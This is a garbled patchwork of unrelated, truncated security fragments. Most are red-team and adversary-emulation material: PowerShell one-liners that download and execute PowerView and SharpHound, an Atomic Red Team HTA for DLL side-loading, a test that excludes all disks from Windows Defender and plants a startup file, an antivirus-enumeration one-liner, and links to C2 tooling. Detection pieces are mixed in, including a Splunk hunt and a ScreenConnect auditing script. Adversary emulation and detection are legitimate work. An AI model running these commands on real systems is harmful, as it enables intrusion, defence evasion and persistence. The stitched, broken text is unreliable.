| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
| <html> | |
| <head> | |
| <title>Atomic Red Team - DLL Side-Loading HTA</title> | |
| <HTA:APPLICATION ID="AtomicSideLoad" APPLICATIONNAME="AtomicSideLoad" BORDER="thin" BORDERSTYLE="normal" ICON="shell32.dll,4" > | |
| <script language="VBScript"> | |
| Dim shell | |
| Set shell = CreateObject("Wscript.Shell") | |
| ' Base64 encoded content of invite.zip - which is https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary">https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary | |
| Dim base64EncodedContent |
| bingmaps | |
| calculator | |
| callto | |
| conf | |
| DLNA-PLAYSINGLE | |
| Explorer.AssocActionId.BurnSelection | |
| Explorer.AssocActionId.EraseDisc | |
| Explorer.AssocActionId.ZipSelection | |
| Explorer.AssocProtocol.search-ms | |
| Explorer.BurnSelection |
| [POWERSHELL-DOWNLOAD-HUNT] | |
| dispatch.earliest_time = -24h@h | |
| dispatch.latest_time = now | |
| dispatchAs = user | |
| display.general.type = statistics | |
| display.page.search.mode = verbose | |
| display.page.search.tab = statistics | |
| display.visualizations.charting.chart = bar | |
| display.visualizations.show = 0 | |
| search = FileName=powershell.exe (CommandLine=*DownloadFile* OR CommandLine=*invoke-webrequest*) | stats values(CommandLine) as "commands" by ComputerName |
| attack_technique: Many | |
| display_name: Slash and Grab Post-Ex | |
| atomic_tests: | |
| - name: Add all logical disks to Windows Defender exclusion list | |
| description: | | |
| This test adds all logical disks on the system to the Windows Defender exclusion list. | |
| supported_platforms: | |
| - windows | |
| executor: | |
| command: | |
| ## Chain Reaction | |
| ## Add all logical disks to Windows Defender exclusion list | |
| Write-Output "Adding all logical disks to Windows Defender exclusion list" | |
| foreach ($disk in Get-WmiObject Win32_Logicaldisk){ | |
| Add-MpPreference -ExclusionPath ($disk.deviceid + "\") | |
| } | |
| Start-Sleep -s 3 | |
| ## Download and move a file to the startup folder |
The following is the base nginx.conf file utilized to proxy to applications. Note the most important part is the logging kv, in which we log as much data with. This is CIM compliant and does map to the Splunk Web Datamodel.
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
Modify, copy and paste the following with appropraite permissions to enable SACL object access on the ScreenConnect directories or App_Extensions directory.
# PowerShell script to enable auditing for event ID 4663 for all write operations to a specified path
# Define the path
$folderPath = "C:\Program Files (x86)\ScreenConnect\App_Extensions"
# Step 1: Enable Audit Policy
| https://raw.githubusercontent.com/FortyNorthSecurity/C2concealer/3630a87e56a1e36ea0d907903fc9b7460419e71f/C2concealer/components/postex.py | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/Payload_Type/apollo/agent_code/Apollo/CommandModules/SpawnTo.cs | |
| https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/documentation-payload/apollo/commands/spawnto_x64.md | |
| https://raw.githubusercontent.com/TheRipperJhon/CAPE/2bc977577a8fcc81a46046fe5bf9248ed3ac0c28/modules/processing/parsers/malwareconfig/CobaltStrike.py | |
| https://raw.githubusercontent.com/Tylous/SourcePoint/7bebe641d9c0d2dbc41c27ef621333f257cbd3e6/Struct/Struct.go | |
| https://raw.githubusercontent.com/MythicAgents/Apollo/92958fc2c9511d738bc1cd2dd44405c650991014/documentation-payload/apollo/opsec.md | |
| https://raw.githubusercontent.com/nsquar3/malware_analysis/e7f3070f4 |
| #AntiVirus Query | |
| #Author: @r3dQu1nn | |
| #Queries the Registry for AV installed | |
| #Thanks to @i_am_excite and @merrillmatt011 for the help | |
| #Props to @zerosum0x0 for the wmic find! | |
| #Long ass one-liner :) | |
| $powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE) |